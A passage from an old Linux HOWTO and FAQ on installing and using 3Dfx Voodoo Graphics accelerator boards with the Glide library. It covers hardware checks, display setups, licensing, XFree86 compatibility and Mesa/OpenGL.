Moreover, a Voodoo Graphics (tm) could use two TMU's (texture
management or texelfx units), and finally, two Voodoo Graphics (tm)
could be combined with a mechanism called Scan-Line Interleaving
(SLI). SLI essentially means that each Pixelfx unit effectively
provides only every other scanline, which decreases bandwidth impact
on each Pixelfx' framebuffer memory.



3. Installation

Configuring Linux to support 3Dfx accelerators involves the following
steps:

1. Installing the board.

2. Installing the Glide distribution.

3. Compiling, linking and/or running the application.

The next sections will cover each of these steps in detail.


3.1. Installing the board

Follow the manufacturer's instructions for installing the hardware or
have your dealer perform the installation. It should not be necessary
to select settings for IRQ, DMA channel, either Plug&Pray (tm) or
factory defaults should work. The add-on boards described here are
memory mapped devices and do not use IRQ's. The only kind of conflict
to avoid is memory overlap with other devices.

As 3Dfx does not develop or sell any boards, do not contact them on
any problems.


3.1.1. Troubleshooting the hardware installation

To check the installation and the memory mapping, do cat /proc/pci.
The output should contain something like

______________________________________________________________________
Bus 0, device 12, function 0:
VGA compatible controller: S3 Inc. Vision 968 (rev 0).
Medium devsel. IRQ 11.
Non-prefetchable 32 bit memory at 0xf4000000.

Bus 0, device 9, function 0:
Multimedia video controller: Unknown vendor Unknown device (rev 2).
Vendor id=121a. Device id=1.
Fast devsel. Fast back-to-back capable.
Prefetchable 32 bit memory at 0xfb000000.
______________________________________________________________________


for a Diamond Monster 3D used with a Diamond Stealth-64. Additionally
a cat /proc/cpuinfo /proc/meminfo might be helpfull for tracking down
conflicts and/or submitting a bug report.

With current kernels, you will probably get a boot warning like

______________________________________________________________________
Jun 12 12:31:52 hal kernel: Warning : Unknown PCI device (121a:1).
Please read include/linux/pci.h
______________________________________________________________________


which could be safely ignored. If you happen to have a board not very
common, or have encountered a new revision, you should take the time
to follow the advice in /usr/include/linux/pci.h and send all neces-
sary information to linux-pcisupport@cao-vlsi.ibp.fr.

If you experience any problems with the board, you should try to
verify that DOS and/or Win95 or NT support works. You will probably
not receive any useful response from a board manufacturer on a bug
report or request regarding Linux. Having dealt with the Diamond
support e-mail system, I would not expect useful responses for other
operating systems either.


3.1.2. Configuring the kernel

There is no kernel configuration necessary, as long as PCI support is
enabled. The Linux Kernel HOWTO
should be
consulted for the details of building a kernel.



3.1.3. Configuring devices

The current drivers do not (yet) require any special devices. This is
different from other driver developments (e.g. the sound drivers,
where you will find a /dev/dsp and /dev/audio). The driver uses the
/dev/mem device which should always be available. In consequence, you
need to use setuid or root privileges to access the accelerator board.


3.2. Setting up the Displays

There are two possible setups with add-on boards. You could either
pass-through the video signal from your regular VGA board via the
accelerator board to the display, or you could use two displays at the
same time. Rely to the manual provided by the board manufacturer for
details. Both configurations have been tried with the Monster 3D
board.


3.2.1. Single screen display solution

This configuration allows you to check basic operations of the
accelerator board - if the video signal is not transmitted to the
display, hardware failure is possible.

Beware that the video output signal might deteoriate significantly if
passed through the video board. To a degree, this is inevitable.
However, reviews have complained about below-average of the cables
provided e.g. with the Monster 3D, and judging from the one I tested,
this has not changed.

There are other pitfalls in single screen configurations. Switching
from the VGA display mode to the accelerated display mode will change
resolution and refresh rate as well, even if you are using 640x480
e.g. with X11, too. Moreover, if you are running X11, your
application is responsible for demanding all keyboard and mouse
events, or you might get stuck because of changed scope and exposure
on the X11 display (that is effectively invisible when the accelerated
mode is used) You could use SVGA console mode instead of X11.

If you are going to use a single screen configuration and switch modes
often, remember that your monitor hardware might not enjoy this kind
of use.



3.2.2. Single screen dual cable setup

Some high end monitors (e.g. the EIZO F-784-T) come with two
connectors, one with 5 BNC connectors for RGB, HSync, VSync, the other
e.g. a regular VGA or a 13W3 Sub-D VGA. These displays usually also
feature a front panel input selector to safely switch from one to the
other. It is thus possible to use e.g. a VGA-to-BNC cable with your
high end 2D card, and a VGA-to-13W3 Sub-D cable with your 3Dfx, and
effectively run dual screen on one display.


3.2.3. Dual screen display solution

The accelerator board does not need the VGA input signal. Instead of
routing the common video output through the accelerator board, you
could attach a second monitor to its output, and use both at the same
time. This solution is more expensive, but gives best results, as your
main display will still be hires and without the signal quality losses
involved in a pass-through solution. In addition, you could use X11
and the accelerated full screen display in parallel, for development
and debugging.

A common problem is that the accelerator board will not provide any
video signal when not used. In consequence, each time the graphics
application terminates, the hardware screensave/powersave might kick
in depending on your monitors configuration. Again, your hardware
might not enjoy being treated like this. You should use

______________________________________________________________________
setenv SST_DUALSCREEN 1
______________________________________________________________________


to force continued video output in this setup.


3.3. Installing the Glide distribution

The Glide driver and library are provided as a single compressed
archive. Use tar and gzip to unpack, and follow the instructions in
the README and INSTALL accompanying the distribution. Read the
install script and run it. Installation puts everything in
/usr/local/glide/include,lib,bin and sets the ld.conf to look there.
Where it installs and setting ld.conf are independent actions. If you
skip the ld.conf step then you need the LD_LIBRARY_PATH.

You will need to install the header files in a location available at
compile time, if you want to compile your own graphics applications.
If you do not want to use the installation as above (i.e. you insist
on a different location), make sure that any application could access
the shared libary at runtime, or you will get a response like can't
load library 'libglide.so'.



3.3.1. Using the detect program

There is a bin/detect program in the distribution (the source is not
available). You have to run it as root, and you will get something
like

______________________________________________________________________
slot vendorId devId baseAddr0 command description
---- -------- ------ ---------- ------- -----------
00 0x8086 0x122d 0x00000000 0x0006 Intel:430FX (Triton)
07 0x8086 0x122e 0x00000000 0x0007 Intel:ISA bridge
09 0x121a 0x0001 0xfb000008 0x0002 3Dfx:video multimedia adapter
10 0x1000 0x0001 0x0000e401 0x0007 ???:SCSI bus controller
11 0x9004 0x8178 0x0000e001 0x0017 Adaptec:SCSI bus controller
12 0x5333 0x88f0 0xf4000000 0x0083 S3:VGA-compatible display co
______________________________________________________________________


as a result. If you do not have root privileges, the program will bail
out with

______________________________________________________________________
Permission denied: Failed to change I/O privilege. Are you root?
______________________________________________________________________


output might come handy for a bug report as well.



3.3.2. Using the test programs

Within the Glide distribution, you will find a folder with test
programs. Note that these test programs are under 3Dfx copyright, and
are legally available for use only if you have purchased a board with
a 3Dfx chipset. See the LICENSE file in the distribution, or their web
site www.3dfx.com for details.

It is recommend to compile and link the test programs even if there
happen to be binaries in the distribution. Note that some of the
programs will requires some files like alpha.3df from the distribution
to be available in the same folder. All test programs use the 640x480
screen resolution. Some will request a veriety of single character
inputs, others will just state Press A Key To Begin Test. Beware of
loss of input scope if running X11 on the same screen at the same
time.

See the README.test for a list of programs, and other details.



4. Answers To Frequently Asked Questions

The following section answers some of the questions that (will) have
been asked on the Usenet news groups and mailing lists. The FAQ has
been subdivided into several parts for convenience, namely

o FAQ: Requirements?

o FAQ: Voodoo Graphics (tm)? 3Dfx?

o FAQ: Glide?

o FAQ: Glide and SVGA?

o FAQ: Glide and XFree86?

o FAQ: Glide versus OpenGL/Mesa?

o FAQ: But Quake?

o FAQ: Troubleshooting?

Each section lists several questions and answers, which will
hopefully address most problems.



5. FAQ: Requirements?



5.1. What are the system requirements?

A Linux PC, PCI 2.1 compliant, a monitor capable of 640x480, and a 3D
accelerator board based on the 3Dfx Voodoo Graphics (tm). It will work
on a P5 or P6, with or without MMX. The current version does not use
MMX, but it has some optimized code paths for P6.

At one point, some 3Dfx statements seemed to imply that using Linux
Glide required using a RedHat distribution. Note that while Linux
Glide has originally been ported in a RedHat 4.1 environment, it has
been used and tested with many other Linux distributions, including
homebrew, Slackware, and Debian 1.3.1.


5.2. Does it work with Linux-Alpha?

There is currently no Linux Glide distribution available for any
platform besides i586. As the Glide sources are not available for
distribution, you will have to wait for the binary. Quantum3D has DEC
Alpha support announced for 2H97. Please contact Daryll Strauss if you
are interested in supporting this.

There is also the issue of porting the the assembly modules. While
there are alternative C paths in the code, the assembly module in
Glide (essentially triangle setup) offered significant performance
gains depending on the P5 CPU used.



5.3. Which 3Dfx chipsets are supported?

Currently, the 3Dfx Voodoo Graphics (tm) chipset is supported under
Linux. The Voodoo Rush (tm) chipset is not yet supported.


5.4. Is the Voodoo Rush (tm) supported?

The current port of Glide to Linux does not support the Voodoo Rush
(tm). An update is in the works.

The problem is that at one point the Voodoo Rush (tm) driver code in
Glide depended on Direct Draw. There was an SST96 based DOS portion in
the library that could theoretically be used for Linux, as soon as all
portions residing in the 2D/Direct Draw/D3D combo driver are replaced.

Thus Voodoo Rush (tm) based boards like the Hercules Stingray 128/3D
or Intergraph Intense Rush are not supported yet.



5.5. Which boards are supported?

There are no officially supported boards, as 3Dfx does not sell any
boards. This section does not attempt to list all boards, it will just
give an overview, and will list only boards that have been found to
cause trouble.

It is important to recognize that Linux support for a given board does
not only require a driver for the 3D accelerator component. If a board
features its own VGA core as well, support by either Linux SVGA or
XFree86 is required as well (see section about Voodoo Rush (tm)
chipset). Currently, an add-on solution is recommended, as it allows
you to choose a regular graphics board well supported for Linux. There
are other aspects discussed below.


All Quantum3D Obsidian boards, independend of texture memory, frame
buffer memory, number of Pixelfx and Texelfx units, and SLI should
work. Same for all other Voodoo Graphics (tm) based boards, like
Orchid Righteous 3D, Canopus Pure 3D, Flash 3D, and Diamond Monster
3D. Voodoo Rush (tm) based boards are not yet supported.

Boards that are not based on 3Dfx chipsets (e.g. manufactured by S3,
Matrox, 3Dlabs, Videologic) do not work with the 3Dfx drivers and are
beyond the scope of this document.



5.6. How do boards differ?

As the board manufacturers are using the same chipset, any differences
are due to board design. Examples are quality of the pass-through
cable and connectors (reportedly, Orchid provided better quality than
Diamond), availability of a TV-compliant video signal output (Canopus
Pure 3D), and, most notably, memory size on board.

Most common were boards for games with 2MB texture cache and 2 MB
framebuffer memory, however, the Canopus Pure3D comes with a maximal 4
MB texture cache, which is an advantage e.g. with games using
dynamically changed textures, and/or illumation textures (Quake, most
notably). The memory architecture of a typical Voodoo Graphics (tm)
board is described below, in a separate section.

Quantum 3D offers the widest selection of 3Dfx-based boards, and is
probably the place to go if you are looking for a high end Voodoo
Graphics (tm) based board configuration. Quantum 3D is addressing the
visual simulation market, while most of the other vendors are only
targetting the consumer-level PC-game market.



5.7. What about AGP?

There is no Voodoo Graphics (tm) or Voodoo Rush (tm) AGP board that I
am aware of. I am not aware of AGP support under Linux, and I do not
know whether upcmong AGP boards using 3Dfx technology might possibly
be supported with Linux.



6. FAQ: Voodoo Graphics (tm)? 3Dfx?

6.1. Who is 3Dfx?

3Dfx is a San Jose based manufacturer of 3D graphics accelerator
hardware for arcade games, game consoles, and PC boards. Their
official website is www.3dfx.com. 3Dfx does not sell any boards, but
other companies do, e.g. Quantum3D.



6.2. Who is Quantum3D?

Quantum3D started as a 3Dfx spin-off, manufacturing high end
accelerator boards based on 3Dfx chip technology for consumer and
business market, and supplying arcade game technology. See their home
page at www.quantum3d.com for additional information. For general
inquiries regarding Quantum3D, please send mail to info@quantum3d.


6.3. What is the Voodoo Graphics (tm)?

The Voodoo Graphics (tm) is a chipset manufactured by 3Dfx. It is used
in hardware acceleration boards for the PC. See the HOWTO section on
supported hardware.


6.4. What is the Voodoo Rush (tm)?

The Voodoo Rush (tm) is a derivate of the Voodoo Graphics (tm) that
has an interface to cooperate with a 2D VGA video accelerator,
effectively supporting accelerated graphics in windows. This combo is
currently not supported with Linux.


6.5. What is the Voodoo 2 (tm)?

The Voodoo 2 (tm) is the successor of the Voodoo Graphics (tm)
chipset, featuring several improvements. It is announced for late
March 1998, and annoucements of Voodoo 2 (tm) based boards have been
published e.g. by Quantum 3D, by Creative Labs, Orchid Technologies,
and Diamond Multimedia.

The Voodoo 2 (tm) is supposed to be backwards compatible. However, a
new version of Glide will have to be ported to Linux.



6.6. What is VGA pass-though?

The Voodoo Graphics (tm) (but not the Voodoo Rush (tm)) boards are
add-on boards, meant to be used with a regular 2D VGA video
accelerator board. In short, the video output of your regular VGA
board is used as input for the Voodoo Graphics (tm) based add-on
board, which by default passes it through to the display also
connected to the Voodoo Graphics (tm) board. If the Voodoo Graphics
(tm) is used (e.g. by a game), it will disconnect the VGA input
signal, switch the display to a 640x480 fullscreen mode with the
refresh rate configured by SST variables and the application/driver,
and generate the video signal itself. The VGA doesn't need to be aware
of this, and won't be.

This setup has several advantages: free choice of 2D VGA board, which
is an issue with Linux, as XFree86 drivers aren't available for all
chipsets and revisions, and a cost effective migration path to
accelerated 3D graphics. It also has several disadvantages: an
application using the Voodoo Graphics (tm) might not re-enable video
output when crashing, and regular VGA video signal deteoriates in the
the pass-through process.


6.7. What is Texelfx or TMU?

Voodoo Graphics (tm) chipsets have two units. The first one interfaces
the texture memory on the board, does the texture mapping, and
ultimately generates the input for the second unit that interfaces the
framebuffer. This one is called Texelfx, aka Texture Management Unit,
aka TMU. The neat thing about this is that a board can use two Texelfx
instead of only one, like some of the Quantum3D Obsidian boards did,
effectively doubling the processing power in some cases, depending on
the application.

As each Texelfx can address 4MB texture memory, a dual Texelfx setup
has an effective texture cache of up to 8MB. This can be true even if
only one Texelfx is actually needed by a particular application, as
textures can be distributed to both Texelfx, which are used depending
on the requested texture. Both Texelfx are used together to perform
certain operations as trilinear filtering and illumination
texture/lightmap passes (e.g. in glQuake) in a single pass instead of
the two passes that are required with only one Texelfx. To actually
exploit the theoretically available speedup and cache size increase, a
Glide application has to use both Texelfx properly.

The two Texelfx can not be used separately to each draw a textured
triangle at the same time. A triangle is always drawn using whatever
the current setup is, which can be to use both Texelfx for a single
pass operation combining two textures, or one Texelfx for only a
single texture. Each Texelfx can only access its own memory.



6.8. What is a Pixelfx unit?

Voodoo Graphics (tm) chipsets have two units. The second one
interfaces the framebuffer and ultimately generates the depth buffer
and pixel color updates. This one is called Pixelfx. The neat thing
here is that two Pixelfx units can cooperate in SLI mode, like with
some of the Quantum3D Obsidian boards, effectively doubling the frame
rate.



6.9. What is SLI mode?

SLI means "Scanline Interleave". In this mode, two Pixelfx are
connected and render in alternate turns, one handling odd, the other
handling even scanlines of the actual output. Inthis mode, each
Pixelfx stores only half of the image and half of the depth buffer
data in its own local framebuffer, effectively doubling the number of
pixels.

The Pixelfx in question can be on the same board, or on two boards
properly connected. Some Quantum3D Obsidian boards support SLI with
Voodoo Graphics (tm).

As two cards can decode the same PCI addresses and receive the same
data, there is not necessarily additional bus bandwidth required by
SLI. On the other hand, texture data will have to be replicated on
both boards, thus the amount of texture memory effectively stays the
same.



6.10. Is there a single board SLI setup?

There are now two types of Quantum3D SLI boards. The intial setup
used two boards, two PCI slots, and an interconnect (e.g. the Obsidian
100-4440). The later revision which performs identically is contained
on one full-length PCI board (e.g. Obsidian 100-4440SB). Thus a
single board SLI solution is possible, and has been done.



6.11. How much memory? How many buffers?

The most essential difference between different boards using the
Voodoo Graphics (tm) chipset is the amount and organization of memory.
Quantum3D used a three digit scheme to descibe boards. Here is a
slightly modifed one (anticipating Voodoo 2 (tm)). Note that if you
use more than one Texelfx, they need the same amount of texture cache
memory each, and if you combine two Pixelfx, each needs the same
amount of frame buffer memory.
______________________________________________________________________
"SLI / Pixelfx / Texelfx1 / Texelfx2 "
______________________________________________________________________


It means that a common 2MB+2MB board would be a 1/2/2/0 solution, with
the minimally required total 4Mb of memory. A Canopus Pure 3D would be
1/2/4/0, or 6MB. An Obsidian-2220 board with two Texelfx would be
1/2/2/2, and an Obsidian SLI-2440 board would be 2/2/4/4. A fully
featured dual board solution (2 Pixelfx, each with 2 Texelfx and 4MB
frame buffer, each Texelfx 4 MB texture cache) would be 2/4/4/4, and
the total amount of memory would be SLI*(Pixelfx+Texelfx1+Texelfx2),
or 24 MB.

So there.


6.12. Does the Voodoo Graphics (tm) do 24 or 32 bit color?

No. The Voodoo Graphics (tm) architecture uses 16bpp internally. This
is true for Voodoo Graphics (tm), Voodoo Rush (tm) and Voodoo 2 (tm)
alike. Quantum3D claims to implement 22-bpp effective color depth with
an enhanced 16-bpp frame buffer, though.


6.13. Does the Voodoo Graphics (tm) store 24 or 32 bit z-buffer per
pixel?

No. The Voodoo Graphics (tm) architecture uses 16bpp internally for
the depth buffer, too. This again is true for Voodoo Graphics (tm),
Voodoo Rush (tm) and Voodoo 2 (tm) alike. Again, Quantum3D claims that
using the floating point 16-bits per pixel (bpp) depth buffering
provides 22-bpp effective Z-buffer precision.


6.14. What resolutions does the Voodoo Graphics (tm) support?

The Voodoo Graphics (tm) chipset supports up to 4 MB frame buffer
memory. Presuming double buffering and a depth buffer, a 2MB
framebuffer will support a resolution of 640x480. With 4 MB frame
buffer, 800x600 is possible.

Unfortunately 960x720 is not supported. The Voodoo Graphics (tm)
chipset requires that the amount of memory for a particular resolution
must be such that the vertical and horizontal resolutions must be
evenly divisible by 32. The video refresh controller, though can
output any particular resolution, but the "virtual" size required for
the memory footprint must be in dimensions evenly divisible by 32.
So, 960x720 actually requires 960x736 amount of memory, and
960x736x2x3 = 4.04MBytes.

However, using two boards with SLI, or a dual Pixelfx SLI board means
that each framebuffer will only have to store half of the image. Thus
2 times 4 MB in SLI mode are good up to 1024x768, which is the maximum
because of the overall hardware design. You will be able to do
1024x768 tripled buffered with Z, but you will not be able to do e.g.
1280x960 with double buffering.

Note that triple buffering (no VSync synchonization required by the
application), stereo buffering (for interfacing LCD shutters) and
other more demanding setups will severely decrease the available
resolution.



6.15. What texture sizes are supported?

The maximum texture size for the Voodoo Graphics (tm) chipset is
256x256, and you have to use powers of two. Note that for really small
textures (e.g. 16x16) you are better off merging them into a large
texture, and adjusting your effective texture coordinates
appropriately.


6.16. Does the Voodoo Graphics (tm) support paletted textures?

The Voodoo Graphics (tm) hardware and Glide support the palette
extension to OpenGL. The most recent version of Mesa does support the
GL_EXT_paletted_texture and GL_EXT_shared_texture_palette extensions.



6.17. What about overclocking?

If you want to put aside considerations about warranty and
overheating, and want to do overclocking to boost up performance even
further, there is related info out on the web. The basic mechanism is
to use Glide environment variables to adjust the clock.

Note that the actual recommended clock is board dependend. While the
default clock speed is 50 Mhz, the Diamond Monster 3D property sheet
lets you set up a clock of 57 MHz. It all comes down to the design of
a specific board, and which components are used with the Voodoo
Graphics (tm) chipset - most notably access speed of the RAM in
question. If you exceed the limits of your hardware, rendering
artifacts will occur to say the least. Reportedly, 57 MHz usually
works, while 60 MHz or more is already pushing it.

Increasing the clock frequency also means increasing the waste heat
disposed in the chips, in a nonlinear dependency (10% increase in
frequency means a lot larger increase in heating). In consequence, for
permanent overclocking you might want to educate yourself about ways
to add cooling fans to the board in a way that does not affect
warranty. A very recommendable source is the "3Dfx Voodoo Heat Report"
by Eric van Ballegoie, available on the web.



6.18. Where could I get additional info on Voodoo Graphics (tm)?

There is a FAQ by 3Dfx, which should be available at their web site.
You will find retail information at the following locations:
www.3dfx.com and www.quantum3d.com.

Inofficial sites that have good info are "Voodoo Extreme" at
www.ve3d.com, and "Operation 3Dfx" at www.ve3d.com.



7. FAQ: Glide? TexUS?

7.1. What is Glide anyway?

Glide is a proprietary API plus drivers to access 3D graphics
accelerator hardware based on chipsets manufactured by 3Dfx. Glide has
been developed and implemented for DOS, Windows, and Macintosh, and
has been ported to Linux by Daryll Strauss.



7.2. What is TexUS?

In the distribution is a libtexus.so, which is the 3Dfx Interactive
Texture Utility Software. It is an image processing libary and
utility program for preparing images for use with the 3Dfx Interactive
Glide library. Features of TexUS include file format conversion,
MIPmap creation, and support for 3Dfx Interactive Narrow Channel
Compression textures.

The TexUS utility program texus reads images in several popular
formats (TGA, PPM, RGT), generates MIPmaps, and writes the images as
3Dfx Interactive textures files (see e.g. alpha.3df, as found in the
distribution) or as an image file for inspection. For details on the
parameters for texus, and the API, see the TexUS documentation.



7.3. Is Glide freeware?

Nope. Glide is neither GPL'ed nor subject to any other public license.
See LICENSE in the distribution for any details. Effectively, by
downloading and using it, you agree to the End User License Agreement
(EULA) on the 3Dfx web site. Glide is provided as binary only, and you
should neither use nor distribute any files but the ones released to
the public, if you have not signed an NDA. The Glide distribution
including the test program sources are copyrighted by 3Dfx.

The same is true for all the sources in the Glide distribution. In the
words of 3Dfx: These are not public domain, but they can be freely
distributed to owners of 3Dfx products only. No card, No code!


7.4. Where do I get Glide?

The entire 3Dfx SDK is available for download off their public web-
site located at www.3dfx.com/software/download_glide.html. Anything
else 3Dfx publicly released by 3Dfx is nearby on their website, too.

There is also an FTP site, ftp.3dfx.com. The FTP has a longer timeout,
and some of the larger files have been broken into 3 files (approx.
3MB each).



7.5. Is the Glide source available?

Nope. The Glide source is made available only based on a special
agreement and NDA with 3Dfx.


7.6. Is Linux Glide supported?

Currently, Linux Glide is unsupported. Basically, it is provided under
the same disclaimers as the 3Dfx GL DLL (see below).

However, 3Dfx definitely wants to provide as much support as possible,
and is in the process of setting up some prerequisites. For the time
being, you will have to rely on the 3Dfx newsgroup (see below).

In addition, the Quantum3D web page claims that Linux support (for
Obsidian) is planned for both Intel and AXP architecture systems in
2H97.



7.7. Where could I post Glide questions?

There are newsgroups currently available only on the NNTP server
news.3dfx.com run by 3Dfx. This USENET groups are dedicated to 3Dfx
and Glide in general, and will mainly provide assistance for DOS,
Win95, and NT. The current list includes:

______________________________________________________________________
3dfx.events
3dfx.games.glquake
3dfx.glide
3dfx.glide.linux
3dfx.products
3dfx.test
______________________________________________________________________


and the 3dfx.oem.products.* group for specific boards, eg.
3dfx.oem.products.quantum3d.obsidian. Please use
news.3dfx.com/3dfx.glide.linux for all Lnux Glide related questions.

A mailing list dedicated to Linux Glide is in preparation for 1Q98.
Send mail to majordomo@gamers.org, no subject, body of the message
info linux-3dfx to get information about the posting guidelines, the
hypermail archive and how to subscribe to the list or the digest.



7.8. Where to send bug reports?

Currently, you should rely on the newsgroup (see above), that is
news.3dfx.com/3dfx.glide.linux. There is no official support e-mail
set up yet. For questions not specific to Linux Glide, make sure to
use the other newsgroups.


7.9. Who is maintaining it?

3Dfx will appoint an official maintainer soon. Currently, inofficial
maintainer of the Linux Glide port is Daryll Strauss. Please post bug
reports in the newsgroup (above). If you are confident that you found
a bug not previously reported, please mail to Daryll at
daryll@harlot.rb.ca.us


7.10. How can I contribute to Linux Glide?

You could submit precise bug reports. Providing sample programs to be
included in the distribution is another possibility. A major
contribution would be adding code to the Glide based Mesa Voodoo
driver source. See section on Mesa Voodoo below.



7.11. Do I have to use Glide?

Yes. As of now, there is no other Voodoo Graphics (tm) driver
available for Linux. At the lowest level, Glide is the only interface
that talks directly to the hardware. However, you can write OpenGL
code without knowing anything about Glide, and use Mesa with the Glide
based Mesa Voodoo driver. It helps to be aware of the involvement of
Glide for recognizing driver limitations and bugs, though.



7.12. Should I program using the Glide API?

That depends on the application you are heading for. Glide is a
proprietary API that is partly similar to OpenGL or Mesa, partly
contains features only available as EXTensions to some OpenGL
implementations, and partly contains features not available anywhere
but within Glide.

If you want to use the OpenGL API, you will need Mesa (see below).
Mesa, namely the Mesa Voodoo driver, offers an API resembling the well
documented and widely used OpenGL API. However, the Mesa Voodoo driver
is in early alpha, and you will have to accept performance losses and
lack of support for some features.

In summary, the decision is up to you - if you are heading for maximum
performance while accepting potential problems with porting to
non-3Dfx hardware, Glide is not a bad choice. If you care about
maintenance, OpenGL might be the best bet in the long run.



7.13. What is the Glide current version?

The current version of Linux Glide is 2.4. The next version will
probably be identical to the current version for DOS/Windows, which is
2.4.3, which comes in two distributions. Right now, various parts of
Glide are different for Voodoo Rush (tm) (VR) and Voodoo Graphics (tm)
(VG) boards. Thus you have to pick up separate distributions (under
Windows) for VR and VG. The same will be true for Linux. There will
possibly be another chunk of code and another distribution for Voodoo
2 (tm) (V2) boards.

There is also a Glide 3.0 in preparation that will extend the API for
use of triangle fans and triangle strips, and provide better state
change optimization. Support for fans and strips will in some
situations significantly reduce the amount of data sent ber triangle,
and the Mesa driver will benefit from this, as the OpenGL API has
separate modes for this. For a detailed explanation on this see e.g.
the OpenGL documentation.



7.14. Does it support multiple Texelfx already?

Multiple Texelfx/TMU's can be used for single pass trilinear
mipmapping for improvement image quality without performance penalty
in current Linux Glide already. You will need a board with two Texelfx
(that is, one of the appropriate Quantum3D Obsidian boards). The
application needs to specify the use of both Texelfx accordingly, it
does not happen automatically.

Note that because most applications are implemented for consumer
boards with a single Texelfx, they might not query the presence of a
second Texelfx, and thus not use it. This is not a flaw of Glide but
of the application.



7.15. Is Linux Glide identical to DOS/Windows Glide?

The publicly available version of Linux Glide should be identical to
the respective DOS/Windows versions. Delays in releasing the Linux
port of newer DOS/Windows releases are possible.


7.16. Where to I get information on Glide?

There is exhaustive information available from 3Dfx. You could
download it from their home page at
www.3dfx.com/software/download_glide.html. These are for free,
presuming you bought a 3Dfx hardware based board. Please read the
licensing regulations.

Basically, you should look for some of the following:

o Glide Release Notes

o Glide Programming Guide

o Glide Reference Manual

o Glide Porting Guide

o TexUs Texture Utility Software

o ATB Release Notes

o Installing and Using the Obsidian

These are available as Microsoft Word documents, and part of the
Windows Glide distribution, i.e. the self-extracting archive file.
Postscript copies for separate download should be available at
www.3dfx.com as well. Note that the release numbers are not always
in sync with those of Glide.



7.17. Where to get some Glide demos?

You will find demo sources for Glide within the distribution (test
programs), and on the 3Dfx home page. The problem with the latter is
that some require ATB. To port these demos to Linux, the event
handling has to be completely rewritten.

In addition, you might find useful some of the OpenGL demo sources
accompanying Mesa and GLUT. While the Glide API is different from the
OpenGL API, they target the same hardware rendering pipeline.



7.18. What is ATB?

Some of the 3Dfx demo programs for Glide depend not only on Glide but
also on 3Dfx's proprietary Arcade Toolbox (ATB), which is available
for DOS and Win32, but has not been ported for Linux. If you are a
devleoper, the sources are available within the Total Immersion
program, so porting ATB to Linux would be possible.



8. FAQ: Glide and XFree86?


8.1. Does it run with XFree86?

Basically, the Voodoo Graphics (tm) hardware does not care about X.
The X server will not even notice that the video signal generated by
the VGA hardware does not reach the display in single screen
configurations. If your application is not written X aware, Glide
switching to full screen mode might cause problems (see
troubleshooting section). If you do not want the overhead of writing
an X11-aware application, you might want to use SVGA console mode
instead.

So yes, it does run with XFree86, but no, it is not cooperating if you
don't write your application accordingly. You can use the Mesa "window
hack", which will be significantly slower than fullscreen, but still a
lot faster than software rendering (see section below).



8.2. Does it only run full screen?

See above. The Voodoo Graphics (tm) hardware is not window environment
aware, neither is Linux Glide. Again, the experimental Mesa "window
hack" covered below will allow for pasting the Voodoo Graphics (tm)
board framebuffer's content into an X11 window.



8.3. What is the problem with AT3D/Voodoo Rush (tm) boards?

There is an inherent problem when using Voodoo Rush (tm) boards with
Linux: Basically, these boards are meant to be VGA 2D/3D accelerator
boards, either as a single board solution, or with a Voodoo Rush (tm)
based daughterboard used transparently. The VGA component tied to the
Voodoo Rush (tm) is a Alliance Semiconductor's ProMotion-AT3D
multimedia accelerator. To use this e.g. with XFree86 at all, you
need a driver for the AT3D chipset.

There is a mailing list on this, and a web site with FAQ at
www.frozenwave.com/linux-stingray128. Look there for most current
info. There is a SuSE maintained driver at
ftp.suse.com/suse_update/special/xat3d.tgz. Reportedly, the XFree86
SVGA server also works, supporting 8, 16 and 32 bpp. Official support
will probably be in XFree86 4.0. XFree86 decided to prepare an
intermediate XFree86 3.3.2 release as well, which might already
address the issues.

The following XF86Config settings reportedly work.

______________________________________________________________________
# device section settings
Chipset "AT24"
Videoram 4032

# videomodes tested by Oliver Schaertel
# 25.18 28.32 for 640 x 480 (70hz)
# 61.60 for 1024 x 786 (60hz)
# 120 for 1280 x 1024 (66hz)
______________________________________________________________________


In summary, there is nothing prohibiting this except for the fact that
the drivers in XFree86 are not yet finished.

If you want a more technical explanation: Voodoo Rush (tm) support
requires X server changes to support grabbing a buffer area in the
video memory on the AT3D board, as the Voodoo Rush (tm) based boards
need to store their back buffer and z buffer there. This memory
allocation and locking requirement is not a 3Dfx specific problem, it
is also needed e.g. for support of TV capture cards, and is thus under
active development for XFree86. This means changes at the device
dependend X level (thus XAA), which are currently implemented as an
extension to XFree86 DGA (Direct Graphics Access, an X11 extension
proposal implemented in different ways by Sun and XFree86, that is not
part of the final X11R6.1 standard and thus not portable). It might be
part of an XFree86 GLX implementation later on. The currently
distributed X servers assume they have full control of the
framebuffer, and use anything that is not used by the visual region of
the framebuffer as pixmap cache, e.g. for caching fonts.



8.4. What about GLX for XFree86?

There are a couple of problems.

The currently supported Voodoo Graphics (tm) hardware and the
available revision of Linux Glide are full screen only, and not set up
to share a framebuffer with a window environment. Thus GLX or other
integration with X11 is not yet possible.

The Voodoo Rush (tm) might be capable of cooperating with XFree86
(that is, an SVGA compliant board will work with the XFree86 SVGA
server), but it is not yet supported by Linux Glide, nor do S3 or
other XFree86 servers support these boards yet.

In addition, GLX is tied to OpenGL or, in the Linux case, to Mesa.
The XFree86 team is currently working on integrating Mesa with their X
Server. GLX is in beta, XFree86 3.3 has the hooks for GLX. See Steve
Parker's GLX pages at www.cs.utah.edu/~sparker/xfree86-3d/ for the
most recent information. Moreover, there is a joint effort by XFree86
and SuSe, which includes a GLX, see www.suse.de/~sim/. Currently,
Mesa still uses its GLX emulation with Linux.



8.5. Glide and commerical X Servers?

I have not received any mail regarding use of Glide and/or Mesa with
commercial X Servers. I would be interested to get confirmation on
this, especially on Mesa and Glide with a commercial X Server that has
GLX support.



8.6. Glide and SVGA?

You should have no problems running Glide based applications either
single or dual screen using VGA modes. It might be a good idea to set
up the 640x480 resolution in the SVGA modes, too, if you are using a
single screen setup.


8.7. Glide and GGI?

A GGI driver for Glide is under development by Jon M. Taylor, but has
not officially been released and was put on hold till completion of
GGI 0.0.9. For information about GGI see synergy.caltech.edu/~ggi/.
If you are adventurous, you might find the combination of XGGI (a GGI
based X Server for XFree86) and GGI for Glide an interesting prospect.
There is also a GGI driver interfacing the OpenGL API; tested with
unaccelerated Mesa. Essentially, this means X11R6 running on a Voodoo
Graphics (tm), using either Mesa or Glide directly.



9. FAQ: OpenGL/Mesa?



9.1. What is OpenGL?

OpenGL is an immediate mode graphics programming API originally
developed by SGI based on their previous proprietary Iris GL, and
became in industry standard several years ago. It is defined and
maintained by the Architectural Revision Board (ARB), an organization
that includes members as SGI, IBM, and DEC, and Microsoft.

OpenGL provides a complete feature set for 2D and 3D graphics
